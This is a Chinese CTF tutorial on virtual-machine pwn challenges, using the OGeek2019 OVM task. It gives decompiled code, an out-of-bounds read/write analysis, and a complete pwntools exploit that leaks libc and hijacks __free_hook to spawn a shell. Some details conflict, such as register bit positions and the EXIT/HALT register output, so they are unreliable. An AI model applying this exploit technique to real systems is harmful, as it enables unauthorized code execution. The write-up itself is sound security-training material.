VMPWN入门教程：从原理到实践<\/h1>

1. 什么是VMPWN<\/h2>

VMPWN是指虚拟机逃逸或虚拟机安全漏洞利用技术，在CTF比赛中通常指：<\/p>

汇编类<\/strong>：在程序中实现运算指令来模拟程序的运行<\/li>

编译类<\/strong>：在程序中自定义运算指令的程序<\/li> <\/ol>
常见漏洞点：越界读写<\/strong>，题目难度主要集中在逆向分析上。<\/p>
2. 示例题目分析：[OGeek2019 Final]OVM<\/h2>
2.1 程序保护机制<\/h3>

没有开启Canary<\/li>
其他保护全开（NX、PIE等）<\/li>
使用Ubuntu 16.04自带的2.23环境<\/li> <\/ul>
2.2 主要函数分析<\/h3>
main函数<\/h4>
int<\/span> __fastcall<\/span> main<\/span>(int<\/span> argc, const<\/span> char<\/span> **<\/span>argv, const<\/span> char<\/span> **<\/span>envp) { <\/span><\/span> unsigned<\/span> __int16<\/span> v4; \/\/ [rsp+2h] [rbp-Eh] BYREF <\/span><\/span><\/span><\/span> unsigned<\/span> __int16<\/span> v5; \/\/ [rsp+4h] [rbp-Ch] BYREF <\/span><\/span><\/span><\/span> unsigned<\/span> __int16<\/span> v6; \/\/ [rsp+6h] [rbp-Ah] BYREF <\/span><\/span><\/span><\/span> unsigned<\/span> int<\/span> v7; \/\/ [rsp+8h] [rbp-8h] <\/span><\/span><\/span><\/span> int<\/span> i; \/\/ [rsp+Ch] [rbp-4h] <\/span><\/span><\/span><\/span> <\/span><\/span> comment =<\/span> malloc(0x8CuLL<\/span>); <\/span><\/span> setbuf(stdin, 0LL<\/span>); <\/span><\/span> setbuf(stdout, 0LL<\/span>); <\/span><\/span> setbuf(stderr, 0LL<\/span>); <\/span><\/span> signal(2<\/span>, signal_handler); <\/span><\/span> <\/span><\/span> \/\/ 初始化虚拟机寄存器 <\/span><\/span><\/span><\/span> write(1<\/span>, "WELCOME TO OVM PWN<\/span>\n<\/span>"<\/span>, 0x16uLL<\/span>); <\/span><\/span> write(1<\/span>, "PC: "<\/span>, 4uLL<\/span>); <\/span><\/span> _isoc99_scanf("%hd"<\/span>, &<\/span>v5); <\/span><\/span> getchar(); <\/span><\/span> write(1<\/span>, "SP: "<\/span>, 4uLL<\/span>); <\/span><\/span> _isoc99_scanf("%hd"<\/span>, &<\/span>v6); <\/span><\/span> getchar(); <\/span><\/span> reg[13<\/span>] =<\/span> v6; \/\/ SP <\/span><\/span><\/span><\/span> reg[15<\/span>] =<\/span> v5; \/\/ PC <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 输入代码大小 <\/span><\/span><\/span><\/span> write(1<\/span>, "CODE SIZE: "<\/span>, 0xBuLL<\/span>); <\/span><\/span> _isoc99_scanf("%hd"<\/span>, &<\/span>v4); <\/span><\/span> getchar(); <\/span><\/span> <\/span><\/span> \/\/ 检查代码大小 <\/span><\/span><\/span><\/span> if<\/span> (v6 +<\/span> (unsigned<\/span> int<\/span>)v4 ><\/span> 0x10000<\/span> ||<\/span> !<\/span>v4) { <\/span><\/span> write(1<\/span>, "EXCEPTION<\/span>\n<\/span>"<\/span>, 0xAuLL<\/span>); <\/span><\/span> exit(155<\/span>); <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 输入代码 <\/span><\/span><\/span><\/span> write(1<\/span>, "CODE: "<\/span>, 6uLL<\/span>); <\/span><\/span> running =<\/span> 1<\/span>; <\/span><\/span> for<\/span> (i =<\/span> 0<\/span>; v4 ><\/span> i; ++<\/span>i) { <\/span><\/span> _isoc99_scanf("%d"<\/span>, &<\/span>memory[v5 +<\/span> i]); <\/span><\/span> if<\/span> ((memory[i +<\/span> v5] &<\/span> 0xFF000000<\/span>) ==<\/span> 0xFF000000<\/span>) <\/span><\/span> memory[i +<\/span> v5] =<\/span> -<\/span>536870912<\/span>; <\/span><\/span> getchar(); <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 虚拟机主循环 <\/span><\/span><\/span><\/span> while<\/span> (running) { <\/span><\/span> v7 =<\/span> fetch(); <\/span><\/span> execute(v7); <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 结束处理 <\/span><\/span><\/span><\/span> write(1<\/span>, "HOW DO YOU FEEL AT OVM?<\/span>\n<\/span>"<\/span>, 0x1BuLL<\/span>); <\/span><\/span> read(0<\/span>, comment, 0x8CuLL<\/span>); <\/span><\/span> sendcomment(comment); <\/span><\/span> write(1<\/span>, "Bye<\/span>\n<\/span>"<\/span>, 4uLL<\/span>); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>fetch函数<\/h4> __int64<\/span> fetch<\/span>() { <\/span><\/span> int<\/span> v0; \/\/ eax <\/span><\/span><\/span><\/span> v0 =<\/span> reg[15<\/span>]; <\/span><\/span> reg[15<\/span>] =<\/span> v0 +<\/span> 1<\/span>; <\/span><\/span> return<\/span> (unsigned<\/span> int<\/span>)memory[v0]; <\/span><\/span>} <\/span><\/span><\/code><\/pre>execute函数（关键）<\/h4> ssize_t __fastcall<\/span> execute<\/span>(int<\/span> opcode) { <\/span><\/span> \/\/ 提取指令字段 <\/span><\/span><\/span><\/span> v4 =<\/span> (opcode &<\/span> 0xF0000u<\/span>) >><\/span> 16<\/span>; \/\/ 目标寄存器 <\/span><\/span><\/span><\/span> v3 =<\/span> (unsigned<\/span> __int16<\/span>)(opcode &<\/span> 0xF00<\/span>) >><\/span> 8<\/span>; \/\/ 源寄存器1 <\/span><\/span><\/span><\/span> v2 =<\/span> opcode &<\/span> 0xF<\/span>; \/\/ 源寄存器2\/立即数 <\/span><\/span><\/span><\/span> result =<\/span> HIBYTE(opcode); \/\/ 操作码 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 指令分发 <\/span><\/span><\/span><\/span> if<\/span> (HIBYTE(opcode) ==<\/span> 0x70<\/span>) { \/\/ ADD <\/span><\/span><\/span><\/span> reg[v4] =<\/span> reg[v2] +<\/span> reg[v3]; <\/span><\/span> } else<\/span> if<\/span> (HIBYTE(opcode) ><\/span> 0x70u<\/span>) { <\/span><\/span> \/\/ 其他指令处理... <\/span><\/span><\/span><\/span> } else<\/span> if<\/span> (HIBYTE(opcode) ==<\/span> 0x30<\/span>) { \/\/ LOAD (漏洞点) <\/span><\/span><\/span><\/span> reg[v4] =<\/span> memory[reg[v2]]; <\/span><\/span> } else<\/span> if<\/span> (HIBYTE(opcode) ><\/span> 0x30u<\/span>) { <\/span><\/span> switch<\/span> (HIBYTE(opcode)) { <\/span><\/span> case<\/span> 'P'<\/span>:<\/span> \/\/ PUSH <\/span><\/span><\/span><\/span> LODWORD(result) =<\/span> reg[13<\/span>]; <\/span><\/span> reg[13<\/span>] =<\/span> result +<\/span> 1<\/span>; <\/span><\/span> result =<\/span> (int<\/span>)result; <\/span><\/span> stack[(int<\/span>)result] =<\/span> reg[v4]; <\/span><\/span> break<\/span>; <\/span><\/span> case<\/span> '`'<\/span>:<\/span> \/\/ POP <\/span><\/span><\/span><\/span> --<\/span>reg[13<\/span>]; <\/span><\/span> result =<\/span> (ssize_t)reg; <\/span><\/span> reg[v4] =<\/span> stack[reg[13<\/span>]]; <\/span><\/span> break<\/span>; <\/span><\/span> case<\/span> '@'<\/span>:<\/span> \/\/ STORE (漏洞点) <\/span><\/span><\/span><\/span> result =<\/span> (ssize_t)memory; <\/span><\/span> memory[reg[v2]] =<\/span> reg[v4]; <\/span><\/span> break<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> \/\/ 其他指令处理... <\/span><\/span><\/span><\/span> return<\/span> result; <\/span><\/span>} <\/span><\/span><\/code><\/pre>sendcomment函数<\/h4> void<\/span> __fastcall<\/span> sendcomment<\/span>(void<\/span> *<\/span>a1) { <\/span><\/span> free(a1); <\/span><\/span>} <\/span><\/span><\/code><\/pre>2.3 关键漏洞分析<\/h3> LOAD指令（0x30）<\/strong>：reg[v4] = memory[reg[v2]]<\/code><\/p> 使用movsxd<\/code>指令，进行有符号扩展<\/li> 如果reg[v2]<\/code>为负数，可以越界读取内存<\/li> <\/ul> <\/li> STORE指令（0x40）<\/strong>：memory[reg[v2]] = reg[v4]<\/code><\/p> 同样存在有符号扩展问题<\/li> 可以越界写入内存<\/li> <\/ul> <\/li> UAF漏洞<\/strong>：<\/p> comment<\/code>堆块在程序开始时分配<\/li> 结束时通过read<\/code>输入数据并free<\/code><\/li> 可以劫持free_hook<\/code>实现任意代码执行<\/li> <\/ul> <\/li> <\/ol> 2.4 指令编码格式<\/h3> 字段位置<\/th> 位数<\/th> 含义<\/th> <\/tr> <\/thead> 24-31<\/td> 8<\/td> 操作码<\/td> <\/tr> 20-23<\/td> 4<\/td> 目标寄存器<\/td> <\/tr> 12-15<\/td> 4<\/td> 源寄存器1<\/td> <\/tr> 0-3<\/td> 4<\/td> 源寄存器2\/立即数<\/td> <\/tr> <\/tbody> <\/table> 2.5 完整指令集<\/h3> 指令<\/th> 操作码<\/th> 功能<\/th> <\/tr> <\/thead> MOV reg, op<\/td> 0x10<\/td> reg[dest] = op<\/td> <\/tr> MOV reg, 0<\/td> 0x20<\/td> reg[dest] = 0<\/td> <\/tr> LOAD<\/td> 0x30<\/td> reg[dest] = memory[reg[src2]]<\/td> <\/tr> STORE<\/td> 0x40<\/td> memory[reg[src2]] = reg[dest]<\/td> <\/tr> PUSH<\/td> 0x50<\/td> stack[result] = reg[dest]<\/td> <\/tr> POP<\/td> 0x60<\/td> reg[dest] = stack[reg[13]]<\/td> <\/tr> ADD<\/td> 0x70<\/td> reg[dest] = reg[src2] + reg[src1]<\/td> <\/tr> SUB<\/td> 0x80<\/td> reg[dest] = reg[src1] - reg[src2]<\/td> <\/tr> AND<\/td> 0x90<\/td> reg[dest] = reg[src2] & reg[src1]<\/td> <\/tr> OR<\/td> 0xA0<\/td> reg[dest] = reg[src2]<\/td> <\/tr> XOR<\/td> 0xB0<\/td> reg[dest] = reg[src2] ^ reg[src1]<\/td> <\/tr> SHL<\/td> 0xC0<\/td> reg[dest] = reg[src1] << reg[src2]<\/td> <\/tr> SHR<\/td> 0xD0<\/td> reg[dest] = reg[src1] >> reg[src2]<\/td> <\/tr> EXIT<\/td> 0xE0<\/td> 停止虚拟机<\/td> <\/tr> HALT<\/td> 0xFF<\/td> 打印寄存器值并停止<\/td> <\/tr> <\/tbody> <\/table> 3. 利用思路<\/h2> 3.1 泄露libc地址<\/h3> 利用LOAD指令的负数索引越界读取GOT表<\/p> stdin<\/code>的GOT地址：0x201F80<\/li> memory<\/code>数组地址：0x202060<\/li> 偏移：-56 (0xFFFFFFC8)<\/li> <\/ul> <\/li> 构造负数索引：<\/p> 通过移位和加法运算构造-56<\/li> <\/ul> <\/li> 读取GOT表项：<\/p> 需要两个寄存器分别存储地址的高32位和低32位<\/li> <\/ul> <\/li> <\/ol> 3.2 劫持free_hook<\/h3> 计算free_hook<\/code>地址：<\/p> free_hook = leaked_addr + offset<\/code><\/li> <\/ul> <\/li> 修改comment<\/code>指针：<\/p> 使用STORE指令越界写入free_hook - 8<\/code><\/li> <\/ul> <\/li> 构造payload：<\/p> 前8字节：\/bin\/sh\x00<\/code><\/li> 后8字节：system<\/code>地址<\/li> <\/ul> <\/li> <\/ol> 3.3 完整利用流程<\/h3> 构造负数索引读取GOT表<\/li> 泄露libc地址<\/li> 计算free_hook<\/code>和system<\/code>地址<\/li> 修改comment<\/code>指针指向free_hook - 8<\/code><\/li> 输入\/bin\/sh\x00<\/code> + system_addr<\/code><\/li> 触发free<\/code>执行system("\/bin\/sh")<\/code><\/li> <\/ol> 4. EXP编写示例<\/h2> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>context.<\/span>log_level =<\/span> 'debug'<\/span> <\/span><\/span> <\/span><\/span>def<\/span> code<\/span>(op, dest, src1, src2): <\/span><\/span> return<\/span> (op <<<\/span> 24<\/span>) |<\/span> (dest <<<\/span> 16<\/span>) |<\/span> (src1 <<<\/span> 8<\/span>) |<\/span> src2 <\/span><\/span> <\/span><\/span># 构造-56的指令序列<\/span> <\/span><\/span>payload =<\/span> [ <\/span><\/span> code(0x10<\/span>, 0<\/span>, 0<\/span>, 8<\/span>), # reg[0] = 8<\/span> <\/span><\/span> code(0x10<\/span>, 1<\/span>, 0<\/span>, 0xff<\/span>), # reg[1] = 0xff<\/span> <\/span><\/span> code(0x10<\/span>, 2<\/span>, 0<\/span>, 0xff<\/span>), # reg[2] = 0xff<\/span> <\/span><\/span> code(0xc0<\/span>, 2<\/span>, 2<\/span>, 0<\/span>), # reg[2] = reg[2] << reg[0] = 0xff00<\/span> <\/span><\/span> code(0x70<\/span>, 2<\/span>, 2<\/span>, 1<\/span>), # reg[2] = reg[2] + reg[1] = 0xffff<\/span> <\/span><\/span> code(0xc0<\/span>, 2<\/span>, 2<\/span>, 0<\/span>), # reg[2] = reg[2] << reg[0] = 0xffff00<\/span> <\/span><\/span> code(0x70<\/span>, 2<\/span>, 2<\/span>, 1<\/span>), # reg[2] = reg[2] + reg[1] = 0xffffff<\/span> <\/span><\/span> code(0xc0<\/span>, 2<\/span>, 2<\/span>, 0<\/span>), # reg[2] = reg[2] << reg[0] = 0xffffff00<\/span> <\/span><\/span> code(0x10<\/span>, 1<\/span>, 0<\/span>, 0xc8<\/span>), # reg[1] = 0xc8<\/span> <\/span><\/span> code(0x70<\/span>, 2<\/span>, 2<\/span>, 1<\/span>), # reg[2] = reg[2] + reg[1] = 0xffffffc8 = -56<\/span> <\/span><\/span> <\/span><\/span> # 读取GOT表项<\/span> <\/span><\/span> code(0x30<\/span>, 3<\/span>, 0<\/span>, 2<\/span>), # reg[3] = mem[reg[2]] = mem[-56]<\/span> <\/span><\/span> code(0x10<\/span>, 1<\/span>, 0<\/span>, 1<\/span>), # reg[1] = 1<\/span> <\/span><\/span> code(0x70<\/span>, 2<\/span>, 2<\/span>, 1<\/span>), # reg[2] = reg[2] + reg[1] = -55<\/span> <\/span><\/span> code(0x30<\/span>, 4<\/span>, 0<\/span>, 2<\/span>), # reg[4] = mem[reg[2]] = mem[-55]<\/span> <\/span><\/span> <\/span><\/span> # 计算free_hook地址<\/span> <\/span><\/span> code(0x10<\/span>, 1<\/span>, 0<\/span>, 0x10<\/span>), # reg[1] = 0x10<\/span> <\/span><\/span> code(0xc0<\/span>, 1<\/span>, 1<\/span>, 0<\/span>), # reg[1] = reg[1] << reg[0] = 0x1000<\/span> <\/span><\/span> code(0x10<\/span>, 0<\/span>, 0<\/span>, 0x90<\/span>), # reg[0] = 0x90<\/span> <\/span><\/span> code(0x70<\/span>, 1<\/span>, 1<\/span>, 0<\/span>), # reg[1] = reg[1] + reg[0] = 0x1090<\/span> <\/span><\/span> code(0x70<\/span>, 3<\/span>, 3<\/span>, 1<\/span>), # reg[3] = reg[3] + reg[1] = mem[-56] + 0x1090 = free_hook - 8<\/span> <\/span><\/span> <\/span><\/span> # 修改comment指针<\/span> <\/span><\/span> code(0x10<\/span>, 1<\/span>, 0<\/span>, 47<\/span>), # reg[1] = 47<\/span> <\/span><\/span> code(0x70<\/span>, 2<\/span>, 2<\/span>, 1<\/span>), # reg[2] = reg[2] + reg[1] = -55 + 47 = -8<\/span> <\/span><\/span> code(0x40<\/span>, 3<\/span>, 0<\/span>, 2<\/span>), # mem[reg[sr2]] = reg[dest] 改comment<\/span> <\/span><\/span> code(0x10<\/span>, 1<\/span>, 0<\/span>, 1<\/span>), # reg[1] = 1<\/span> <\/span><\/span> code(0x70<\/span>, 2<\/span>, 2<\/span>, 1<\/span>), # reg[2] = reg[2] + reg[1] = -8 + 1 = -7<\/span> <\/span><\/span> code(0x40<\/span>, 4<\/span>, 0<\/span>, 2<\/span>), # mem[reg[sr2]] = reg[dest]<\/span> <\/span><\/span> <\/span><\/span> # 退出<\/span> <\/span><\/span> code(0xE0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>) <\/span><\/span>] <\/span><\/span> <\/span><\/span># 交互过程<\/span> <\/span><\/span>io =<\/span> process('.\/ovm'<\/span>) <\/span><\/span>libc =<\/span> ELF('\/lib\/x86_64-linux-gnu\/libc.so.6'<\/span>) <\/span><\/span> <\/span><\/span># 设置PC和SP<\/span> <\/span><\/span>io.<\/span>sendlineafter('PC: '<\/span>, '0'<\/span>) <\/span><\/span>io.<\/span>sendlineafter('SP: '<\/span>, '0'<\/span>) <\/span><\/span> <\/span><\/span># 发送代码<\/span> <\/span><\/span>io.<\/span>sendlineafter('CODE SIZE: '<\/span>, str(len(payload))) <\/span><\/span>for<\/span> ins in<\/span> payload: <\/span><\/span> io.<\/span>sendline(str(ins)) <\/span><\/span> <\/span><\/span># 获取泄露的地址<\/span> <\/span><\/span>io.<\/span>recvuntil('R3: '<\/span>) <\/span><\/span>low_addr =<\/span> int(io.<\/span>recv(8<\/span>), 16<\/span>) <\/span><\/span>io.<\/span>recvuntil('R4: '<\/span>) <\/span><\/span>high_addr =<\/span> int(io.<\/span>recv(4<\/span>), 16<\/span>) <\/span><\/span>free_hook =<\/span> (high_addr <<<\/span> 32<\/span>) +<\/span> low_addr <\/span><\/span> <\/span><\/span># 计算libc基址和system地址<\/span> <\/span><\/span>libc_base =<\/span> free_hook +<\/span> 8<\/span> -<\/span> libc.<\/span>sym['__free_hook'<\/span>] <\/span><\/span>system_addr =<\/span> libc_base +<\/span> libc.<\/span>sym['system'<\/span>] <\/span><\/span> <\/span><\/span># 发送payload<\/span> <\/span><\/span>p1 =<\/span> b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span> +<\/span> p64(system_addr) <\/span><\/span>io.<\/span>sendlineafter('HOW DO YOU FEEL AT OVM?<\/span>\n<\/span>'<\/span>, p1) <\/span><\/span> <\/span><\/span>io.<\/span>interactive() <\/span><\/span><\/code><\/pre>5. 总结<\/h2> 逆向分析<\/strong>：理解虚拟机指令集和内存布局是关键<\/li> 漏洞利用<\/strong>：利用有符号扩展实现越界读写<\/li> 通过GOT表泄露libc地址<\/li> 劫持free_hook实现任意代码执行<\/li> <\/ul> <\/li> 构造技巧<\/strong>：使用移位和加法运算构造特定值<\/li> 注意32位和64位地址的处理<\/li> <\/ul> <\/li> <\/ol> 通过这个例子，可以掌握基本的VMPWN题目分析方法和利用技巧，为进一步学习更复杂的虚拟机题目打下基础。<\/p>